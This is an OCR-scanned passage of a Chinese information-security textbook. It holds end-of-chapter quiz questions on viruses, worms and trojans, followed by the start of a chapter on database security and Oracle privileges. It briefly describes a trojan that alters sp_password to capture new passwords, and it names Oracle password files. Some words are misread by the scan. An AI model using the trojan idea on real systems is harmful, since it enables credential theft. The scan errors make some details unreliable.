C. 木头 做 的 马 D. 计算 机 硬件 设备 
6. 网 络 蠕 虫 一 般 指 利用 计算 机 系统 漏洞 、 通 过 互联 网 传播 扩散 的 一 类 病毒 程序 ， 为 了 
防止 受到 网 络 蠕虫 的 侵害 ， 应 当 注 意 对 ( ) 进 行 升级 更 新 。 
A. 计算 机 操作 系统 B. 计算 机 硬件 
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C. 文字 处 理 软件 D. 杀 病 毒 软件 
7. 计算 机 病毒 不 具有 ( ”) 特 征 。 
A. 破坏 性 B. 隐蔽 性 C. 传染 性 D. 无 针对 性 


8. ( ， ) 是 一 种 基于 远程 控制 的 黑客 工具 ， 它 通常 寄生 于 用 户 的 计算 机 系统 中 盗窃 用 
户 信息 ， 并 通过 网 络 发 送 给 黑客 。 
A. 文件 病毒 B. 木马 C. 引导 型 病毒 ”DD. 蠕虫 
9. ( ” ) 是 一 种 可 以 自我 复制 的 完全 独立 的 程序 ， 它 的 传播 不 需要 借助 被 感染 主机 的 
其 他 程序 。 它 可 以 自动 创建 与 其 功能 完全 相同 的 副本 ， 并 在 没 人 干涉 的 情况 下 自动 运行 。 
A. 文件 病毒 B. 木马 C. 引导 型 病毒 D. 蠕虫 
三 . 简 答题 
. 什么 是 计算 机 病毒 ? 病毒 都 可 以 通过 哪些 途径 传播 ? 
. 什么 是 计算 机 网 络 病毒 ? 简 述 计算 机 网 络 病毒 的 特点 。 
. 简 述 计算 机 网 络 病 毒 的 分 类 。 
. 简 述 计算 机 网 络 病毒 的 危害 。 
. 简 述 病毒 发 作 前 的 症状 。 
. 常用 的 反 病 毒 技术 有 哪些 ? 
. 计算 机 病毒 发 展 的 新 技术 有 哪些 ? 
. 国内 常用 的 杀毒 软件 有 哪些 ? 


co 让 了 wm 一 


(330. 


第 9 章 


数据 库 与 数据 安全 技术 


pl Ro 计算 机 网 络 信息 安全 (第 2 版 ) 


学 习 目 标 
无 论 数据 处 于 存储 状态 还 是 传输 状态 ， 都 可 能 会 受到 安全 威胁 。 要 保证 企 事业 单位 的 
业务 持续 成 功 地 运作 ， 就 要 保护 数据 库 系 统 中 的 数据 安全 。 通 过 对 本 章 内 容 的 学 习 ， 读 者 
应 掌握 以 下 内 容 。 
@ 数据库 系统 特性 及 其 安全 
数据 库 的 安全 特性 。 
数据 库 的 安全 保护 。 
数据 的 完整 性 。 
数据 备份 和 数据 恢复 。 
数据 容 灾 


9.1 数据 库 安 全 概述 


保证 网 络 系统 中 数据 安全 的 主要 任务 就 是 使 数据 免 受 各 种 因素 的 影响 ， 保 护 数据 的 完 
整 性 、 保 密 性 和 可 用 性 。 人 为 的 错误 、 硬 盘 的 损毁 、 计 算 机 病毒 、 自 然 灾 难 等 都 有 可 能 造 
成 数据 库 中 数据 的 丢失 ， 给 企 事业 单位 造成 不 可 估量 的 损失 。 例 如 ， 如 果 丢 失 了 系统 文 
件 、 客 户 资料 、 技 术 文档 、 人 事 档案 文件 、 财 务 账目 文件 等 ， 企 事业 单位 的 业务 将 难以 正 
常 进行 。 因 此 ， 所 有 的 企 事业 单位 管理 者 都 应 采取 有 效 保护 数据 库 的 措施 ， 使 得 灾难 发 生 
后 ， 能 够 尽快 地 恢复 系统 中 的 数据 ， 恢 复 系 统 的 正常 运行 。 

为 了 保护 数据 安全 ， 可 以 采用 很 多 安全 技术 和 措施 。 这 些 技术 和 措施 主要 有 数据 完整 
性 技术 、 数 据 备 份 和 恢复 技术 、 数 据 加 密 技 术 、 访 问 控制 技术 、 用 户 身份 验证 技术 、 数 据 
的 真 伪 鉴 别 技术 和 并 发 控制 技术 等 。 


9.1.1 数据 库 安 全 的 概念 


数据 库 安全 是 指数 据 库 的 任何 部 分 都 没 受到 侵害 ， 或 没 受到 未 经 授权 的 在 取 和 修改 。 
数据 库 安全 性 问题 一 直 是 数据 库 管 理 员 所 关心 的 问题 。 


1. 数据 库 安全 


数据 库 就 是 一 种 结构 化 的 数据 仓库 。 人 们 时 刻 都 在 和 数据 打交道 ， 如 存储 在 个 人 掌上 
计算 机 (PDA) 中 的 数据 、 家 庭 预算 的 电子 数据 表 等 。 对 于 少量 、 简 单 的 数据 ， 如 果 与 其 他 
数据 之 间 的 关联 较 少 或 没有 关联 ， 则 可 将 它们 简单 地 存放 在 文件 中 。 普 通 记录 文件 没有 系 
统 结 构 来 系统 地 反映 数据 间 的 复杂 关系 ， 也 不 能 强制 定义 个 别 数 据 对 象 。 但 是 企业 数据 都 
是 相关 联 的 ， 不 可 能 使 用 普通 的 记录 文件 来 管理 大 量 的 、 复 杂 的 系列 数据 ， 如 银行 的 客户 
数据 或 者 生产 厂商 的 生产 控制 数据 等 。 

数据 库 安全 主要 包括 数据 库 系 统 的 安全 性 和 数据 库 数据 的 安全 性 两 层 含义 。 

(1) 第 一 层 含 义 是 数据 库 系统 的 安全 性 。 数 据 库 系 统 安全 性 是 指 在 系统 级 控制 数据 库 
的 存 取 和 使 用 的 机 制 ， 应 尽 可 能 地 堵 住 潜在 的 各 种 漏洞 ， 防 止 非法 用 户 利 用 这 些 漏 洞 侵入 
数据 库 系统 ; 保证 数据 库 系统 不 因 软 硬件 故障 及 灾害 的 影响 而 不 能 正常 运行 。 数 据 库 系统 
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安全 包括 硬件 运行 安全 、 物 理 控制 安全 、 操 作 系 统 安全 、 用 户 有 连接 数据 库 的 授权 以 及 灾 
害 、 故 障 恢复 。 

(2) 第 二 层 含义 是 数据 库 数据 的 安全 性 。 数 据 库 数据 安全 性 是 指 在 对 象 级 控制 数据 库 
的 存 取 和 使 用 的 机 制 ， 哪 些 用 户 可 存 取 指定 的 模式 对 象 及 在 对 象 上 人 允许 有 哪些 操作 类 型 。 
数据 库 数据 安全 包括 有 效 的 用 户 名 / 口令 鉴别 、 用 户 访问 权限 控制 、 数 据 存 取 权限 和 方式 
控制 、 审 计 跟 踪 、 数 据 加 密 及 防止 电磁 信息 泄露 。 

数据 库 数 据 的 安全 措施 应 能 确保 数据 库 系 统 关 闭 后 ， 当 数据 库 数据 存储 媒体 被 破坏 或 
当 数 据 库 用 户 误 操作 时 ， 数 据 库 数据 信息 不 会 丢失 。 对 于 数据 库 数据 的 安全 问题 ， 数 据 库 管 
理 员 可 以 采用 系统 双 机 热 备份 功能 、 数 据 库 的 备份 和 恢复 、 数 据 加 密 、 访 问 控制 等 措施 。 


2. 数据 库 安全 管理 原则 


一 个 强大 的 数据 库 安全 系统 应 当 确 保 其 中 信息 的 安全 性 ， 并 对 其 进行 有 效 的 管理 控 
制 。 下 面 几 项 数据 库 管理 规则 有 助 于 企业 在 安全 规则 中 实现 对 数据 库 的 安全 保护 。 

1) 管理 细 分 和 委派 原则 

在 数据 库 工作 环境 中 ， 数 据 库 管理 员 一 般 都 是 独立 执行 数据 库 的 管理 和 其 他 事务 工 
作 ， 一 旦 出 现 岗位 变换 ， 将 带 来 一 连 串 的 问题 和 效率 低下 。 通 过 管理 责任 细 分 和 任务 委 
派 ， 数 据 库 管 理 员 可 从 常规 事务 中 解脱 出 来 ， 更 多 地 关注 解决 数据 库 执行 效率 及 与 管理 相 
关 的 重要 问题 ， 从 而 保证 任务 的 高 效 完成 。 企 业 应 设法 通过 功能 和 可 信赖 的 用 户 群 进一步 
细 分 数据 库 管理 的 责任 和 角色 。 

2) 最 小 权限 原则 

企业 必须 本 着 “最 小 权限 ”原则 ， 从 需求 和 工作 职能 两 方面 严格 限制 对 数据 库 的 访 
问 。 通 过 角色 的 合理 运用 ，“ 最 小 权限 ”可 确保 数据 库 功 能 限制 和 特定 数据 的 访问 。 

3) 账号 安全 原则 

对 于 每 一 个 数据 库 连 接 来 说 ， 用 户 账号 都 是 必需 的 。 账 号 应 遵循 传统 的 用 户 账号 管理 
方法 来 进行 安全 管理 ， 这 包括 密码 的 设 定 和 更 改 、 账 号 锁定 功能 、 对 数据 提供 有 限 的 访问 
权限 、 禁 止 休眠 状态 的 账户 、 账 户 的 生命 周期 等 。 

4) 有 效 审计 原则 

数据 库 审计 是 数据 库 安全 的 基本 要 求 ， 它 可 用 来 监视 各 用 户 对 数据 库 施 加 的 操作 。 企 
业 应 针对 自己 的 应 用 和 数据 库 活动 定义 审计 策略 。 条 件 允 许 的 地 方 可 采取 智能 审计 ， 这 样 
不 仅 能 节约 时 间 ， 而 且 能 减少 执行 审计 的 范围 和 对 象 。 通 过 智能 限制 日 志 大 小 ， 还 能 突出 
更 加 关键 的 安全 事件 。 


9.1.2 数据库 管 理 系统 及 特性 


1. 数据 库 管理 系统 简介 

数据 库 管理 系统 (DBMS) 已 经 发 展 了 近 20 年 。 人 们 提出 了 许多 数据 模型 ， 并 一 一 实 
现 ， 其 中 比较 重要 的 是 关系 模型 。 在 关系 型 数据 库 中 ， 数 据 项 保存 在 行 中 ， 文 件 就 像 是 一 
个 表 。 关 系 被 描述 成 不 同 数据 表 间 的 匹配 关系 。 区 别 关 系 模型 和 网 络 及 分 级 型 数据 库 重 要 的 
一 点 就 是 数据 项 关系 可 以 被 动态 地 描述 或 定义 ， 而 不 需要 因 结构 改变 而 重新 加 载 数据 库 。 
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早 在 1980 年 ， 数 据 库 市 场 就 被 关系 型 数据 库 管 理 系 统 所 占领 。 这 个 模型 基于 一 个 可 
靠 的 基础 ， 可 以 简单 并 恰当 地 将 数据 项 描述 成 为 表 (table) 中 的 记录 行 (aw)。 关 系 模型 第 一 
次 广泛 推行 是 在 1980 年 ， 由 于 当时 一 种 标准 的 数据 库 访 问 程序 语言 被 开发 ， 这 种 语言 被 
称 为 结构 化 查询 语言 SQL)。 今 天 ， 成 千 上 万 使 用 关系 型 数据 库 的 应 用 程序 已 经 被 开发 出 
来 ， 如 跟踪 客户 端 处 理 的 银行 系统 、 仓 库 货 物 管理 系统 、 客 户 关系 管 理 (CRM) 系 统 和 人 力 
资源 管理 系统 等 。 由 于 数据 库 保证 了 数据 的 完整 性 ， 企 业 通常 将 他 们 的 关键 业务 数据 存放 
在 数据 库 中 。 因 此 ， 保 护 数据 库 安 全 、 避 免 错 误 和 防止 数据 库 故 障 已 经 成 为 企业 所 关注 的 
重点 。 

2. 数据 库 管理 系统 的 安全 功能 


DBMS 是 专门 负责 数据 库 管理 和 维护 的 计算 机 软件 系统 。 它 是 数据 库 系统 的 核心 ， 不 
仅 负责 数据 库 的 维护 工作 ， 还 能 保护 数据 库 的 安全 性 和 完整 性 。 

DBMS 是 近似 于 文件 系统 的 软件 系统 ， 通 过 它 应 用 程序 和 用 户 可 以 取得 所 需 的 数据 。 
然而 ， 与 文件 系统 不 同 ，DBMS 定义 了 所 管理 数据 之 间 的 结构 和 约束 关系 ， 且 提供 了 一 些 
基本 的 数据 管理 和 安全 功能 。 

1) 数据 的 安全 性 

在 网 络 应 用 上 ， 数 据 库 必 须 是 一 个 可 以 存储 数据 的 安全 地 方 。DBMS 能 够 提供 有 效 的 
备份 和 恢复 功能 ， 来 确保 在 故障 和 错误 发 生 后 ， 数 据 能 够 尽快 地 恢复 并 被 应 用 所 访问 。 对 
于 一 个 企 事业 单位 来 说 ， 把 关键 的 和 重要 的 数据 存放 在 数据 库 中 ， 这 就 要 求 DBMS 必须 能 
够 防止 未 授权 的 数据 访问 。 

只 有 数据 库 管理 员 对 数据 库 中 的 数据 拥有 完全 的 操作 权限 ， 并 可 以 规定 各 用 户 的 权 
限 ，DBMS 保证 对 数据 的 存 取 方法 是 唯一 的 。 每 当 用 户 想 要 存 取 敏 感 数据 时 ，DBMS 就 进 
行 安 全 性 检查 。 在 数据 库 中 ， 对 数据 进行 各 种 类 型 的 操作 (检索 、 修 改 、 删 除 等 ) 时 ， 
DBMS 都 可 以 对 其 实施 不 同 的 安全 检查 。 

2) 数据 的 共享 性 

一 个 数据 库 中 的 数据 不 仅 可 以 为 同一 企业 或 组 织 内 部 的 各 个 部 门 所 共享 ， 也 可 为 不 同 
组 织 、 不 同 地 区 甚至 不 同 国家 的 多 个 应 用 和 用 户 同时 进行 访问 ， 而 且 还 要 不 影响 数据 的 安 
全 性 和 完整 性 ， 这 就 是 数据 共享 。 数 据 共享 是 数据 库 系 统 的 目的 ， 也 是 它 的 一 个 重要 特点 。 

数据 库 中 数据 的 共享 主要 体现 在 以 下 几 个 方面 。 

Q 不 同 的 应 用 程序 可 以 使 用 同一 个 数据 库 。 

@ 不 同 的 应 用 程序 可 以 在 同一 时 刻 去 存 取 同 一 个 数据 。 

@ 数据 库 中 的 数据 不 但 可 供 现 有 的 应 用 程序 共享 ， 还 可 为 新 开发 的 应 用 程序 使 用 。 

@ 应 用 程序 可 用 不 同 的 程序 设计 语言 编写 ， 它 们 可 以 访问 同一 个 数据 库 。 

3) 数据 的 结构 化 

基于 文件 的 数据 的 主要 优势 就 在 于 它 利用 了 数据 结构 。 数 据 库 中 的 文件 相互 联系 ， 并 
在 整体 上 服从 一 定 的 结构 形式 。 数 据 库 具 有 复杂 的 结构 ， 不 仅 因为 它 拥 有 大 量 的 数据 ， 同 
时 也 因为 在 数据 之 间 和 文件 之 间 存 在 着 种 种 联系 。 数据库 的 结构 使 开发 者 避免 了 针对 每 一 
个 应 用 都 需要 重新 定义 数据 逻辑 关系 的 过 程 。 
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4 数据 的 独立 性 


数据 的 独立 性 就 是 数据 与 应 用 程序 之 间 不 存在 相互 依赖 关系 ， 也 就 是 数据 的 逻辑 结 
构 、 存 储 结构 和 存 取 方 法 等 不 因应 用 程序 的 修改 而 改变 ; 反之 亦 然 。 从 某 种 意义 上 讲 ， 一 
个 DBMS 存在 的 理由 就 是 为 了 在 数据 组 织 和 用 户 的 应 用 之 间 提 供 某 种 程度 的 独立 性 。 数 据 
库 系统 的 数据 独立 性 可 分 为 物理 独立 性 和 逻辑 独立 性 两 方面 。 

名 物理 独立 性 。 数 据 库 的 物理 结构 的 变化 不 影响 数据 库 的 应 用 结构 ， 从 而 也 就 不 影 
响 其 相应 的 应 用 程序 。 这 里 的 物理 结构 是 指数 据 库 的 物理 位 置 、 物 理 设备 等 。 

@ 逻辑 独立 性 。 数 据 库 逻 辑 结 构 的 变化 不 影响 用 户 的 应 用 程序 ， 修 改 或 增加 数据 类 
型 、 改 变 各 表 之 间 的 联系 等 都 不 会 导致 应 用 程序 的 修改 。 

以 上 两 种 数据 独立 性 都 要 依靠 DBMS 来 实现 。 到 目前 为 止 ， 物 理 独立 性 已 经 实现 ， 但 
逻辑 独立 性 实现 起 来 非常 困难 。 因 为 数据 结构 一 旦 发 生变 化 ， 一 般 情况 下 ， 相 应 的 应 用 程 
序 都 要 进行 或 多 或 少 的 修改 。 

5) 其 他 安全 功能 

DBMS 除了 具有 一 些 基本 的 数据 库 管理 功能 外 ， 在 安全 性 方面 ， 它 还 具有 以 下 功能 。 

Q@ 保证 数据 的 完整 性 ， 抵 御 一 定 程度 的 物理 破坏 ， 能 维护 和 提交 数据 库 内 容 。 

@ 实施 并 发 控制 ， 避 免 数据 的 不 一 致 性 。 

@ 数据 库 的 数据 备份 与 数据 恢复 。 

@ 能 识别 用 户 ， 分 配 授权 和 进行 访问 控制 ， 包 括 用 户 的 身份 识别 和 验证 。 


3. 数据 库 事务 


“事务 ”是 数据 库 中 的 一 个 重要 概念 ， 是 一 系列 操作 过 程 的 集合 ， 也 是 数据 库 数 据 操 
作 的 并 发 控制 单位 。 一 个 “事务 ”就 是 一 次 活动 所 引起 的 一 系列 的 数据 库 操作 。 例 如 ， 一 
个 会 计 “ 事 务 ”可 能 是 由 读 取 借方 数据 、 减 去 借方 记录 中 的 借款 数量 、 重 写 借方 记录 、 读 
取 贷 方 记录 、 在 贷方 记录 上 的 数量 加 上 从 借方 扣除 的 数量 、 重 写 贷方 记录 、 写 一 条 单独 的 
记录 来 描述 这 次 操作 以 便 日 后 审计 等 操作 组 成 。 所 有 这 些 操作 组 成 了 一 个 “事务 ”， 描 述 
了 一 个 业务 动作 。 无 论 借方 的 动作 还 是 贷方 的 动作 ， 哪 一 个 没有 被 执行 ， 数 据 库 都 不 会 反 
映 该 业务 执行 的 正确 性 。 

DBMS 在 数据 库 操作 时 对 “事务 ”进行 定义 ， 要 么 一 个 “事务 ”应 用 的 全 部 操作 结果 
都 反映 在 数据 库 中 (全 部 完成 )， 要 么 就 一 点 都 没有 反映 在 数据 库 中 (全 部 撤除 )， 数 据 库 回 到 
该 次 事务 操作 的 初始 状态 。 这 就 是 说 ， 一 个 数据 库 “ 事 务 ” 序 列 中 的 所 有 操作 只 有 两 种 结 
果 ， 即 全 部 执行 和 全 部 撤除 。 因 此 ，“ 事 务 ” 是 不 可 分 割 的 单位 。 

上 述 会 计 “ 事 务 ” 例 子 包含 了 两 个 数据 库 操作 : 从 借方 数据 中 扣除 资金 ， 在 贷方 记录 
中 加 入 这 部 分 资金 。 如 果 系 统 在 执行 该 “事务 ”的 过 程 中 崩溃 ， 而 此 时 已 修改 完毕 借方 数 
据 ， 但 还 没有 修改 贷方 数据 ， 资 金 就 会 在 此 时 物化 。 如 果 把 这 两 个 步骤 合并 成 一 个 事务 命 
令 ， 这 在 数据 库 系统 执行 时 ， 要 么 全 部 完成 ， 要 么 一 点 都 不 完成 。 当 只 完成 一 部 分 时 ， 系 
统 是 不 会 对 已 做 的 操作 予以 响应 的 。 
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9.1.3 ”数据 库 系统 的 缺陷 和 威胁 


大 多 数 企业 、 组 织 以 及 政府 部 门 的 电子 数据 都 保存 在 各 种 数据 库 中 。 他 们 用 这 些 数据 
库 保 存 一 些 敏 感 信息 ， 如 员工 薪水 、 医 疗 记录 、 员 工 个 人 资料 等 。 数 据 库 服务 器 还 掌握 着 
敏感 的 金融 数据 ， 包 括 交 易 记 录 、 商 业 事务 和 账号 数据 ， 战 略 上 的 或 者 专业 的 信息 ， 如 专 
利和 工程 数据 ， 甚 至 市 场 计划 等 应 该 保护 起 来 防止 竞争 者 和 其 他 非法 者 获取 的 资料 。 

1. 数据 库 系 统 的 缺陷 

见 的 数据 库 的 安全 漏洞 和 缺陷 有 以 下 几 种 。 

(1) 数据 库 应 用 程序 通常 都 同 操作 系统 的 最 高 管理 员 密 切 相 关 ， 如 Oracle、Sybase 和 

SQL Server 数据 库 系 统 都 涉及 用 户 账号 和 密码 、 认 证 系统 、 授 权 模块 和 数据 对 象 的 许可 控 
制 、 内 置 命令 (存储 过 程 )、 特 定 的 脚本 和 程序 语言 、 中 间 件 、 网 络 协议 、 补 丁 和 服务 包 、 
数据 库 管理 和 开发 工具 等 。 许 多 数据 库 系 统管 理 员 都 把 全 部 精力 投入 到 管理 这 些 复杂 的 系 
统 中 。 安 全 漏洞 和 不 当 的 配置 通常 会 造成 严重 的 后 果 ， 且 都 难以 发 现 。 
(2) 人 们 对 数据 库 安全 的 忽视 。 人 们 认为 只 要 把 网 络 和 操作 系统 的 安全 搞 好 了 ， 所 有 
的 应 用 程序 也 就 安全 了 。 现 在 的 数据 库 系统 都 有 很 多 方面 被 误 用 或 者 有 漏洞 影响 到 安全 。 
而 且 常 用 的 关系 型 数据 库 都 是 “端口 ”型 的 ， 这 就 表示 任何 人 都 能 够 绕 过 操作 系统 的 安全 
机 制 ， 利 用 分 析 工 具 连 接 到 数据 库 上 。 

(3) 部 分 数据 库 机 制 威胁 网 络 低层 安全 。 如 某 公 司 的 数据 库 里 面 保存 着 所 有 技术 文 
档 、 手 册 和 白皮书 ， 但 却 不 重视 数据 库 的 安全 。 这 样 ， 即 使 运行 在 一 个 非常 安全 的 操作 系 
统 上 ， 入 侵 者 也 能 很 容易 通过 数据 库 获 得 操作 系统 权限 。 这 些 存储 过 程 能 提供 一 些 执 行 操 
作 系 统 命令 的 接口 ， 而 且 能 访问 所 有 的 系统 资源 ， 如 果 该 数据 库 服务 器 还 同 其 他 服务 器 建 
立 着 信任 关系 ， 那 么 入 侵 者 就 能 够 对 整个 域 产生 严重 的 安全 威胁 。 因 此 ， 少 数 数据 库 安全 
漏洞 不 仅 威胁 数据 库 的 安全 ， 也 威胁 到 操作 系统 和 其 他 可 信任 系统 的 安全 。 
(4) 安全 特性 缺陷 。 大 多 数 关系 型 数据 库 已 经 存在 10 多 年 了 ， 都 是 成 熟 的 产品 。 但 IT 
业界 和 安全 专家 对 网 络 和 操作 系统 要 求 的 许多 安全 特性 在 多 数 关系 数据 库 上 还 没有 被 使 用 。 
(5) 数据 库 账号 密码 容易 泄露 。 多 数 数据 库 提供 的 基本 安全 特性 ， 都 没有 相应 机 制 来 
限制 用 户 必须 选择 健壮 的 密码 。 许 多 系统 密码 都 能 给 入 侵 者 访问 数据 库 的 机 会 ， 更 有 甚 
者 ， 有 些 密码 就 储存 在 操作 系统 的 普通 文本 文件 中 。 比 如 Oracle 内 部 密码 储存 在 
strxxx.crud 文件 中 ， 其 中 XXX 是 Oracle 系统 ID 和 SID 号 。 该 密码 用 于 数据 库 启动 进程 ， 
提供 完全 访问 数据 库 资源 功能 ， 该 文件 在 Windows NT 中 需要 设置 权限 。Oracle 监听 进程 
密码 保存 在 文件 listener.ora 中 ， 入 侵 者 可 以 通过 这 个 弱点 进行 DoS 攻击 。 

(6) 操作 系统 后 门 。 多 数 数据 库 系统 都 有 一 些 特性 ， 来 满足 数据 库 管 理 员 的 需要 ， 这 
些 也 成 为 数据 库 主 机 操作 系统 的 后 门 。 

(7) 木马 的 威胁 。 著 名 的 木马 能 够 在 密码 改变 存储 过 程 时 修改 密码 ， 并 能 告知 入 侵 者 。 

比如 ， 可 以 添加 几 行 信息 到 sp_password 中 ， 记 录 新 账号 到 库 表 中 ， 通 过 E-mail 发 送 
这 个 密码 ， 或 者 写 到 文件 中 以 后 使 用 等 。 
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2. 数据 库 系统 的 威胁 形式 


对 数据 库 构 成 的 威胁 主要 有 篡改 、 损 坏 和 窃取 3 种 表现 形式 。 

(1) 篡改 。 算 改 指 的 是 对 数据 库 中 的 数据 未 经 授权 进行 的 修改 ， 使 其 失去 原来 的 真实 

性 。 自 改 的 形式 具有 多 样 性 ， 但 有 一 点 是 明确 的 ， 就 是 在 造成 影响 之 前 很 难 发 现 它 。 算 改 
是 由 于 人 为 因素 产生 的 。 一 般 来 说 ， 发 生 这 种 人 为 威胁 的 原因 主要 有 个 人 利益 驱动 、 隐 藏 
证 据 、 恶 作 剧 和 无 知 等 。 
(2) 损坏 。 网 络 系统 中 数据 的 损坏 是 数据 库 安全 性 所 面临 的 一 个 威胁 。 其 表现 形式 是 
表 和 整个 数据 库 部 分 或 全 部 被 删除 、 移 走 或 破坏 。 产 生 这 种 威胁 的 原因 主要 有 破坏 、 恶 作 
剧 和 病毒 。 破 坏 往往 都 带 有 明确 的 作案 动机 ; 恶作剧 者 往往 是 出 于 爱好 或 好 奇 而 给 数据 造 
成 损坏 ， 计 算 机 病毒 不 仅 对 系统 文件 进行 破坏 ， 也 对 数据 文件 进行 破坏 。 

(3) 窃取 。 窃 取 一 般 是 对 敏感 数据 进行 的 。 窃 取 的 手法 除了 将 数据 复制 到 软盘 之 类 的 
可 移动 介质 上 外 ， 也 可 以 把 数据 打印 后 取 走 。 导 致 窃取 威胁 的 因素 有 工商 业 间 谍 、 不 满 和 
要 离开 的 员工 、 被 窃 的 数据 可 能 比 想象 中 的 更 有 价值 等 。 


3. 数据 库 系 统 威 胁 的 来 源 


数据 库 安全 的 威胁 主要 来 自 以 下 几 个 方面 。 

(1) 物理 和 环境 的 因素 。 如 物理 设备 的 损坏 、 设 备 的 机 械 和 电气 故障 、 火 灾 、 水 灾 以 
及 磁盘 磁带 丢失 等 。 

(2) 事务 内 部 故障 。 数 据 库 “ 事 务 ” 是 指数 据 操作 的 并 发 控制 单位 ， 是 一 个 不 可 分 割 
的 操作 序列 。 数 据 库 事务 内 部 的 故障 多 发 生 于 数据 的 不 一 致 性 ， 主 要 表现 有 丢失 修改 、 不 
能 重复 读 、 无 用 数据 的 读 出 。 

(3) 系统 故障 。 系 统 故 障 又 叫 软 故障 ， 是 指 系统 突然 停止 运行 时 造成 的 数据 库 故 障 。 
这 些 故 障 不 破坏 数据 库 ， 但 影响 正在 运行 的 所 有 事务 ， 因 为 缓冲 区 中 的 内 容 会 全 部 丢失 ， 
运行 的 事务 将 非 正常 终止 ， 从 而 造成 数据 库 处 于 一 种 不 正确 的 状态 。 

(4) 介质 故障 。 介 质 故 障 又 称 硬 故障 ， 主 要 指 外 存储 器 故障 ， 如 磁盘 磁头 碰撞 、 瞬 时 
的 强 磁 场 干扰 等 。 这 类 故障 会 破坏 数据 库 或 部 分 数据 库 ， 并 影响 正在 使 用 数据 库 的 所 有 事务 。 

(5) 并 发 事件 。 在 数据 库 实现 多 用 户 共享 数据 时 ， 可 能 由 于 多 个 用 户 同时 对 一 组 数据 
的 不 同 访问 而 使 数据 出 现 不 一 致 现象 。 

(6) 人 为 破坏 。 某 些 人 为 了 某 种 目的 ， 故 意 破坏 数据 库 。 

(7) 病毒 与 黑客 。 病 毒 可 破坏 计算 机 中 的 数据 ， 使 计算 机 处 于 不 正确 或 瘫痪 状态 ， 黑 
客 是 一 些 精通 计算 机 网 络 和 软 、 硬 件 的 计算 机 操作 者 ， 他 们 往往 利用 非法 手段 取得 相关 授 
权 ， 非 法 地 读 取 甚 至 修改 其 他 计算 机 数据 。 黑 客 的 攻击 和 系统 病毒 发 作 可 破坏 数据 保密 性 
和 数据 完整 性 。 

(8) 未 经 授权 非法 访问 或 非法 修改 数据 库 的 信息 ， 窃 取 数 据 库 数 据 或 使 数据 失去 真实 性 。 

(9) 对 数据 不 正确 的 访问 引起 数据 库 中 数据 的 错误 。 

(10) 网 络 及 数据 库 的 安全 级 别 不 能 满足 应 用 的 要 求 。 

(11) 网 络 和 数据 库 的 设置 错误 和 管理 混乱 造成 越权 访问 和 越权 使 用 数据 。 
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9.2 ”数据库 的 安全 特性 


为 了 保证 数据 库 数 据 的 安全 可 靠 和 正确 有 效 ，DBMS 必须 提供 统一 的 数据 保护 功能 。 
数据 保护 也 称 为 数据 控制 ， 主 要 包括 数据 库 的 安全 性 、 完 整 性 、 并 发 控制 和 恢复 。 下 面 以 
多 用 户 数据 库 系 统 Oracle 为 例 ， 阐 述 数 据 库 的 安全 特性 。 


9.2.1 数据 库 的 安全 性 


数据 库 的 安全 性 是 指 保护 数据 库 以 防止 不 合法 地 使 用 所 造成 的 数据 泄露 、 更 改 或 破 
坏 。 在 数据 库 系统 中 有 大 量 的 计算 机 系统 数据 集中 存放 ， 为 许多 用 户 所 共享 ， 这 样 就 使 安 
全 问题 更 为 突出 。 在 一 般 的 计算 机 系统 中 ， 安 全 措施 是 一 级 级 设置 的 。 


1. 数据 库 的 存 取 控 制 


在 数据 库存 储 一 级 可 采用 密码 技术 ， 若 物理 存储 设备 失窃 ， 它 能 起 到 保密 作用 。 在 数 
据 库 系统 中 可 提供 数据 存 取 控制 ， 来 实施 该 级 的 数据 保护 。 

1) 数据 库 的 安全 机 制 

多 用 户 数 据 库 系统 (如 Oracle) 提 供 的 安全 机 制 可 做 到 以 下 几 点 。 

(1) 防止 非 授权 的 数据 库存 取 。 

(2) 防止 非 授 权 的 对 模式 对 象 的 存 取 。 

(3) 控制 磁盘 使 用 。 

(4) 控制 系统 资源 使 用 。 

(5) 审计 用 户 动作 。 

在 Oracle 服务 器 上 提供 了 一 种 任意 存 取 控 制 ， 是 一 种 基于 特权 限制 信息 存 取 的 方法 。 用 
户 要 存 取 某 一 对 象 必须 有 相应 的 特权 授予 该 用 户 。 已 授权 的 用 户 可 任意 地 授权 给 其 他 用 户 。 

Oracle 保护 信息 的 方法 采用 任意 存 取 控制 来 控制 全 部 用 户 对 命名 对 象 的 存 取 。 用 户 对 
对 象 的 存 取 受 特权 控制 ， 一 种 特权 是 存 取 一 个 命名 对 象 的 许可 ， 为 一 种 规定 格式 。 

2) 模式 和 用 户 机 制 

Oracle 使 用 多 种 不 同 的 机 制 管理 数据 库 安全 性 ， 其 中 有 模式 和 用 户 两 种 机 制 。 

(1) 模式 机 制 。 模 式 为 模式 对 象 的 集合 ， 模 式 对 象 如 表 、 视 图 、 过 程 和 包 等 。 

(2) 用 户 机 制 。 每 一 个 Oracle 数据 库 有 一 组 合法 的 用 户 ， 可 运行 一 个 数据 库 应 用 和 使 
用 该 用 户 连接 到 定义 该 用 户 的 数据 库 。 当 建立 一 个 数据 库 用 户 时 ， 对 该 用 户 建立 一 个 相应 
的 模式， 模式 名 与 用 户 名 相同 。 一 旦 用 户 连接 一 个 数据 库 ， 该 用 户 就 可 存 取 相 应 模式 中 的 
全 部 对 象 ， 一 个 用 户 仅 与 同名 的 模式 相 联系 ， 所 以 用 户 和 模式 是 类 似 的 。 

2. 特权 和 角色 

1) 特权 

特权 是 执行 一 种 特殊 类 型 的 SQL 语句 或 存 取 另 一 用 户 对 象 的 权力 ， 有 系统 特权 和 对 象 


特权 两 类 。 
(1) 系统 特权 。 系 统 特权 是 执行 一 种 特殊 动作 或 者 在 对 象 类 型 上 执行 一 种 特殊 动作 的 
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权力 。 系 统 特权 可 授权 给 用 户 或 角色 。 系 统 可 将 授予 用 户 的 系统 特权 授予 其 他 用 户 或 角 
色 ， 同 样 ， 系 统 也 可 从 那些 被 授权 的 用 户 或 角色 处 收回 系统 特权 。 

(2) 对 象 特权 。 对 象 特权 是 指 在 表 、 视 图 、 序 列 、 过 程 、 函 数 或 包 上 执行 特殊 动作 的 
权利 。 对 于 不 同类 型 的 对 象 ， 有 不 同类 型 的 对 象 特权 。 

2) 角色 

角色 是 相关 特权 的 命名 组 。 数 据 库 系统 利用 角色 可 更 容易 地 进行 特权 管理 。 

(1) 角色 管理 的 优点 。 

@ 减少 特权 管理 。 

@ 动态 特权 管理 。 

@ 特权 的 选择 可 用 性 。 

@ 应 用 可 知性 。 

@@ 专门 的 应 用 安全 性 。 

一 般 ， 建 立 角色 有 两 个 目的 ， 一 是 为 数据 库 应 用 管理 特权 ， 二 是 为 用 户 组 管理 特权 ， 
